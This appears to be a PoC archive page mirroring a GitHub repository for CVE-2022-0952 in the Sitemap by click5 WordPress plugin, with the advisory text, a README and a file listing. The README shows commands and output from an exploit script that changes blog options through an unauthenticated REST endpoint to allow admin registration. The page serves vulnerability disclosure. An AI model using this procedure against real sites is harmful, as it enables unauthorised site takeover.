Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-0952 PoC — Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update

Source
https://github.com/RandomRobbieBF/CVE-2022-0952
Associated Vulnerability
Title:Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update (CVE-2022-0952)
Description:The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.
Description
Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update
Readme
# CVE-2022-0952
Sitemap by click5 &lt; 1.0.36 - Unauthenticated Arbitrary Options Update

# Description

The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.

# Example Enable Admin & Reg

```
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555
The plugin version is below 1.0.36.
The plugin version is 1.0.35
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
```

# Example Disable Admin & Reg

```
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555 --fix yes
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
```
File Snapshot

 [4.0K]  /data/pocs/d27753fcc8a000c16b1ac4ecc5aaa0b50c318485
├── [4.6K]  CVE-2022-0952.py
├── [ 34K]  LICENSE
└── [1.3K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →